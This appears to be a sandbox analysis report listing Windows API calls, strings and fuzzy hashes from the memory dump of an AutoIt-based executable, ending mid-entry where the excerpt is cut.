                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                            • String ID: ($0$tooltips_class32
                                                            • API String ID: 698492251-4156429822
                                                            • Opcode ID: eab52ad66473c2f8282f96d2f09810c5497faa1a0b09c8c08fe572be7cb9f6ae
                                                            • Instruction ID: 26f6679d7da64ea5c182226715f60972ea29ced4648b0efbd78f5a17d5b13967
                                                            • Opcode Fuzzy Hash: eab52ad66473c2f8282f96d2f09810c5497faa1a0b09c8c08fe572be7cb9f6ae
                                                            • Instruction Fuzzy Hash: B3B1DD70614311AFDB54EFA4D948B6ABBE4FF88310F00892DF5999B2A1CB70EC55CB91
                                                            APIs
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001A28BC
                                                            • GetSystemMetrics.USER32(00000007), ref: 001A28C4
                                                            • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 001A28EF
                                                            • GetSystemMetrics.USER32(00000008), ref: 001A28F7
                                                            • GetSystemMetrics.USER32(00000004), ref: 001A291C
                                                            • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 001A2939
                                                            • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 001A2949
                                                            • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 001A297C
                                                            • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 001A2990
                                                            • GetClientRect.USER32(00000000,000000FF), ref: 001A29AE
                                                            • GetStockObject.GDI32(00000011), ref: 001A29CA
                                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 001A29D5
                                                              • Part of subcall function 001A2344: GetCursorPos.USER32(?), ref: 001A2357
                                                              • Part of subcall function 001A2344: ScreenToClient.USER32(002667B0,?), ref: 001A2374
                                                              • Part of subcall function 001A2344: GetAsyncKeyState.USER32(00000001), ref: 001A2399
                                                              • Part of subcall function 001A2344: GetAsyncKeyState.USER32(00000002), ref: 001A23A7
                                                            • SetTimer.USER32(00000000,00000000,00000028,001A1256), ref: 001A29FC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                            • String ID: AutoIt v3 GUI
                                                            • API String ID: 1458621304-248962490
                                                            • Opcode ID: f6988cb411856e5bc9126d24f1c5b34fc4a2f836cae3ad8de90d38d81fabc154
                                                            • Instruction ID: 5103b9a6c5d2e8eb35ffe4f06fabe8d6f797d0341d932bb67c8b9503aef648a0
                                                            • Opcode Fuzzy Hash: f6988cb411856e5bc9126d24f1c5b34fc4a2f836cae3ad8de90d38d81fabc154
                                                            • Instruction Fuzzy Hash: BDB17F75A0020AEFDB24DFA8DD49BAE7BB4FB09714F108529FA15E7290CB74D851CB90
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 002240F6
                                                            • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 002241B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                            • API String ID: 3974292440-719923060
                                                            • Opcode ID: 1d7bd0497dcc434181ef233e786626f852bda0b1515aafd0b1dea2bb81d84228
                                                            • Instruction ID: 32bce4dc5d11b8ccacb9e57644f627267f071803d758a8e900bb45afb138c314
                                                            • Opcode Fuzzy Hash: 1d7bd0497dcc434181ef233e786626f852bda0b1515aafd0b1dea2bb81d84228
                                                            • Instruction Fuzzy Hash: EAA1C134224316EBCB14FFA0D841A7AB3A5BFA5314F10496CB8969B2D2DB30ED59CB41
                                                            APIs
                                                            • LoadCursorW.USER32(00000000,00007F89), ref: 00215309
                                                            • LoadCursorW.USER32(00000000,00007F8A), ref: 00215314
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 0021531F
                                                            • LoadCursorW.USER32(00000000,00007F03), ref: 0021532A
                                                            • LoadCursorW.USER32(00000000,00007F8B), ref: 00215335
                                                            • LoadCursorW.USER32(00000000,00007F01), ref: 00215340
                                                            • LoadCursorW.USER32(00000000,00007F81), ref: 0021534B
                                                            • LoadCursorW.USER32(00000000,00007F88), ref: 00215356
                                                            • LoadCursorW.USER32(00000000,00007F80), ref: 00215361
                                                            • LoadCursorW.USER32(00000000,00007F86), ref: 0021536C
                                                            • LoadCursorW.USER32(00000000,00007F83), ref: 00215377
                                                            • LoadCursorW.USER32(00000000,00007F85), ref: 00215382
                                                            • LoadCursorW.USER32(00000000,00007F82), ref: 0021538D
                                                            • LoadCursorW.USER32(00000000,00007F84), ref: 00215398
                                                            • LoadCursorW.USER32(00000000,00007F04), ref: 002153A3
                                                            • LoadCursorW.USER32(00000000,00007F02), ref: 002153AE
                                                            • GetCursorInfo.USER32(?), ref: 002153BE
                                                            • GetLastError.KERNEL32(00000001,00000000), ref: 002153E9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Cursor$Load$ErrorInfoLast
                                                            • String ID:
                                                            • API String ID: 3215588206-0
                                                            • Opcode ID: be99bd6de18c17ef431873840756fc3fc984cf618dbd2c33b88a077fcd306f76
                                                            • Instruction ID: f74bc639952509430e3bdc3ba8d036e43635640209b7125bf0b8241d7d4ee571
                                                            • Opcode Fuzzy Hash: be99bd6de18c17ef431873840756fc3fc984cf618dbd2c33b88a077fcd306f76
                                                            • Instruction Fuzzy Hash: A6417470E04329AADB109FB69C498AEFFF8EF91B10B10452FE519E7290DAB89441CE51
                                                            APIs
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 001FAAA5
                                                            • __swprintf.LIBCMT ref: 001FAB46
                                                            • _wcscmp.LIBCMT ref: 001FAB59
                                                            • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 001FABAE
                                                            • _wcscmp.LIBCMT ref: 001FABEA
                                                            • GetClassNameW.USER32(?,?,00000400), ref: 001FAC21
                                                            • GetDlgCtrlID.USER32(?), ref: 001FAC73
                                                            • GetWindowRect.USER32(?,?), ref: 001FACA9
                                                            • GetParent.USER32(?), ref: 001FACC7
                                                            • ScreenToClient.USER32(00000000), ref: 001FACCE
                                                            • GetClassNameW.USER32(?,?,00000100), ref: 001FAD48
                                                            • _wcscmp.LIBCMT ref: 001FAD5C
                                                            • GetWindowTextW.USER32(?,?,00000400), ref: 001FAD82
                                                            • _wcscmp.LIBCMT ref: 001FAD96
                                                              • Part of subcall function 001C386C: _iswctype.LIBCMT ref: 001C3874
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                            • String ID: %s%u
                                                            • API String ID: 3744389584-679674701
                                                            • Opcode ID: 424922a39e94b32e5e86514ac8be5de81f088fa2925df0a679e16c6fbf1deba1
                                                            • Instruction ID: fd85827e439119b3fa94d588cbb88dd06ba80c5559897d7447f441f161d9acb0
                                                            • Opcode Fuzzy Hash: 424922a39e94b32e5e86514ac8be5de81f088fa2925df0a679e16c6fbf1deba1
                                                            • Instruction Fuzzy Hash: 96A1BFB120470AABD714DFA0C884FBAB7A8FF14315F408629FAAD92191D734E955CB92
                                                            APIs
                                                            • GetClassNameW.USER32(00000008,?,00000400), ref: 001FB3DB
                                                            • _wcscmp.LIBCMT ref: 001FB3EC
                                                            • GetWindowTextW.USER32(00000001,?,00000400), ref: 001FB414
                                                            • CharUpperBuffW.USER32(?,00000000), ref: 001FB431
                                                            • _wcscmp.LIBCMT ref: 001FB44F
                                                            • _wcsstr.LIBCMT ref: 001FB460
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 001FB498
                                                            • _wcscmp.LIBCMT ref: 001FB4A8
                                                            • GetWindowTextW.USER32(00000002,?,00000400), ref: 001FB4CF
                                                            • GetClassNameW.USER32(00000018,?,00000400), ref: 001FB518
                                                            • _wcscmp.LIBCMT ref: 001FB528
                                                            • GetClassNameW.USER32(00000010,?,00000400), ref: 001FB550
                                                            • GetWindowRect.USER32(00000004,?), ref: 001FB5B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                            • String ID: @$ThumbnailClass
                                                            • API String ID: 1788623398-1539354611
                                                            • Opcode ID: 48228b408305baa5a3d1f0268418b2f4d849715165c4b003ca9e72dec67d409d
                                                            • Instruction ID: 9006d7280abe9d89e070a9a195d5970acbedc3d7130d9ad6c2f95e87786689d1
                                                            • Opcode Fuzzy Hash: 48228b408305baa5a3d1f0268418b2f4d849715165c4b003ca9e72dec67d409d
                                                            • Instruction Fuzzy Hash: 2681BE710083099BDB14DF10C9C5FBABBE8EF54314F088569FE899A0A2DB34DE46CB61
                                                            APIs
                                                              • Part of subcall function 001A2612: GetWindowLongW.USER32(?,000000EB), ref: 001A2623
                                                            • DragQueryPoint.SHELL32(?,?), ref: 0022C917
                                                              • Part of subcall function 0022ADF1: ClientToScreen.USER32(?,?), ref: 0022AE1A
                                                              • Part of subcall function 0022ADF1: GetWindowRect.USER32(?,?), ref: 0022AE90
                                                              • Part of subcall function 0022ADF1: PtInRect.USER32(?,?,0022C304), ref: 0022AEA0
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0022C980
                                                            • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0022C98B
                                                            • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0022C9AE
                                                            • _wcscat.LIBCMT ref: 0022C9DE
                                                            • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0022C9F5
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0022CA0E
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0022CA25
                                                            • SendMessageW.USER32(?,000000B1,?,?), ref: 0022CA47
                                                            • DragFinish.SHELL32(?), ref: 0022CA4E
                                                            • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0022CB41
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                            • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pr&
                                                            • API String ID: 169749273-31770037
                                                            • Opcode ID: 54fc40c1be624e87e74b7db8dc11cea39bb5c075d50a065c4ab524b644a41ca8
                                                            • Instruction ID: 5a63449ce1e4755a053aa05418ba946fca6dac3b90342db8132c8f29dd27c96d
                                                            • Opcode Fuzzy Hash: 54fc40c1be624e87e74b7db8dc11cea39bb5c075d50a065c4ab524b644a41ca8
                                                            • Instruction Fuzzy Hash: 0B617871108301AFC711EFA0DC89DAFBBF8EB99710F40092EF591971A1DB709A59CB62
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: __wcsnicmp
                                                            • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                            • API String ID: 1038674560-1810252412
                                                            • Opcode ID: 3a068a0f4339e028b453a990c304024c0771f7c93f472b8b67b15604a256e67b
                                                            • Instruction ID: 1521bd6d27590e0fafff1ab7c87709b4a17d9d171e9e07eb5b6bfed4c064c16f
                                                            • Opcode Fuzzy Hash: 3a068a0f4339e028b453a990c304024c0771f7c93f472b8b67b15604a256e67b
                                                            • Instruction Fuzzy Hash: AD31D435A58209E6DB14FA60CD83EFEB7A89F36751F600019F911720D1EF71AF18C595
                                                            APIs
                                                            • LoadIconW.USER32(00000063), ref: 001FC4D4
                                                            • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 001FC4E6
                                                            • SetWindowTextW.USER32(?,?), ref: 001FC4FD
                                                            • GetDlgItem.USER32(?,000003EA), ref: 001FC512
                                                            • SetWindowTextW.USER32(00000000,?), ref: 001FC518
                                                            • GetDlgItem.USER32(?,000003E9), ref: 001FC528
                                                            • SetWindowTextW.USER32(00000000,?), ref: 001FC52E
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 001FC54F
                                                            • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 001FC569
                                                            • GetWindowRect.USER32(?,?), ref: 001FC572
                                                            • SetWindowTextW.USER32(?,?), ref: 001FC5DD
                                                            • GetDesktopWindow.USER32 ref: 001FC5E3
                                                            • GetWindowRect.USER32(00000000), ref: 001FC5EA
                                                            • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 001FC636
                                                            • GetClientRect.USER32(?,?), ref: 001FC643
                                                            • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 001FC668
                                                            • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 001FC693
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                            • String ID:
                                                            • API String ID: 3869813825-0
                                                            • Opcode ID: 0b25629cfe78206623a7eeaccf27ad5faec6695ba61427c96ce29654f67dea6e
                                                            • Instruction ID: 6bbda51f25610573bb101c60c65f405bc77c11453bda7876f505d415a48cf0df
                                                            • Opcode Fuzzy Hash: 0b25629cfe78206623a7eeaccf27ad5faec6695ba61427c96ce29654f67dea6e
                                                            • Instruction Fuzzy Hash: 9A514F71A0070DAFDB20DFA8DE89B7EBBB5FF04705F004928E696A25A0C774A945DB50
                                                            APIs
                                                            • _memset.LIBCMT ref: 0022A4C8
                                                            • DestroyWindow.USER32(?,?), ref: 0022A542
                                                              • Part of subcall function 001A7D2C: _memmove.LIBCMT ref: 001A7D66
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0022A5BC
                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0022A5DE
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0022A5F1
                                                            • DestroyWindow.USER32(00000000), ref: 0022A613
                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001A0000,00000000), ref: 0022A64A
                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0022A663
                                                            • GetDesktopWindow.USER32 ref: 0022A67C
                                                            • GetWindowRect.USER32(00000000), ref: 0022A683
                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0022A69B
                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0022A6B3
                                                              • Part of subcall function 001A25DB: GetWindowLongW.USER32(?,000000EB), ref: 001A25EC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                            • String ID: 0$tooltips_class32
                                                            • API String ID: 1297703922-3619404913
                                                            • Opcode ID: aebd754de6ba35d363921306ee4391a2a7dbb18f6bf6bb9782e0118a8b600767
                                                            • Instruction ID: db41d9668860f65c06bf9ca02f9c504d3237e44417dbb84aae7149584701ee0b
                                                            • Opcode Fuzzy Hash: aebd754de6ba35d363921306ee4391a2a7dbb18f6bf6bb9782e0118a8b600767
                                                            • Instruction Fuzzy Hash: 1371AC71150206AFDB20CF68EC49F7677EAFB98700F08492CF995972A0C7B1E956CB52
                                                            APIs
                                                            • CharUpperBuffW.USER32(?,?), ref: 002246AB
                                                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 002246F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: BuffCharMessageSendUpper
                                                            • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                            • API String ID: 3974292440-4258414348
                                                            • Opcode ID: 924f8ae63c14e2d7906fdd0b2ce9d72476ec57f0eb3bad2bd2132a252447a9f0
                                                            • Instruction ID: b90f8bfca510a1c7e073cf82fb3889d31ee3fededd9e234ffb41c660bf0e1122
                                                            • Opcode Fuzzy Hash: 924f8ae63c14e2d7906fdd0b2ce9d72476ec57f0eb3bad2bd2132a252447a9f0
                                                            • Instruction Fuzzy Hash: FA919F34224712EFCB14FF60D851A7AB7A1AFA5314F00446CF8965B3A2DB70ED5ACB81
                                                            APIs
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0022BB6E
                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00226D80,?), ref: 0022BBCA
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0022BC03
                                                            • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0022BC46
                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0022BC7D
                                                            • FreeLibrary.KERNEL32(?), ref: 0022BC89
                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0022BC99
                                                            • DestroyIcon.USER32(?), ref: 0022BCA8
                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0022BCC5
                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0022BCD1
                                                              • Part of subcall function 001C313D: __wcsicmp_l.LIBCMT ref: 001C31C6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                            • String ID: .dll$.exe$.icl
                                                            • API String ID: 1212759294-1154884017
                                                            • Opcode ID: d23500655d9d121ab103dbd29baa26d7cb76239032a83924069bc09efbf91fd2
                                                            • Instruction ID: 5c36568856fd1f278da62060366e489c17bbbf0b8efc37bf5fd7772532ada40a
                                                            • Opcode Fuzzy Hash: d23500655d9d121ab103dbd29baa26d7cb76239032a83924069bc09efbf91fd2
                                                            • Instruction Fuzzy Hash: 3A610271910229BEEB25DFA0ED45FBE77B8EB18710F10412AFC15D60D0DB7499A0CBA0
                                                            APIs
                                                            • LoadStringW.USER32(00000066,?,00000FFF,0022FB78), ref: 0020A0FC
                                                              • Part of subcall function 001A7F41: _memmove.LIBCMT ref: 001A7F82
                                                            • LoadStringW.USER32(?,?,00000FFF,?), ref: 0020A11E
                                                            • __swprintf.LIBCMT ref: 0020A177
                                                            • __swprintf.LIBCMT ref: 0020A190
                                                            • _wprintf.LIBCMT ref: 0020A246
                                                            • _wprintf.LIBCMT ref: 0020A264
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1701443654.00000000001A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001A0000, based on PE: true
                                                            • Associated: 00000000.00000002.1701429773.00000000001A0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.000000000022F000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701520530.000000000025F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1701533939.0000000000268000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1a0000_7RsDGpyOQk.jbxd
                                                            Similarity
                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%#
                                                            • API String ID: 311963372-3349450703
                                                            • Opcode ID: 36d878aebea338d1854bcd48a435a92a6df8c66bc3b60bc972b8b314dd2e500a
                                                            • Instruction ID: e06b1325c94a06c4d12911ad619c2f1522846c665a8bedff3d03ffee48fa158f
                                                            • Opcode Fuzzy Hash: 36d878aebea338d1854bcd48a435a92a6df8c66bc3b60bc972b8b314dd2e500a
                                                            • Instruction Fuzzy Hash: 1451BE3290020ABACF15EBE0DD86EEEB779AF25300F504165F915720E2EB316F59CB61
                                                            APIs
                                                              • Part of subcall function 001A9997: __itow.LIBCMT ref: 001A99C2
                                                              • Part of subcall function 001A9997: __swprintf.LIBCMT ref: 001A9A0C
                                                            • CharLowerBuffW.USER32(?,?), ref: 0020A636
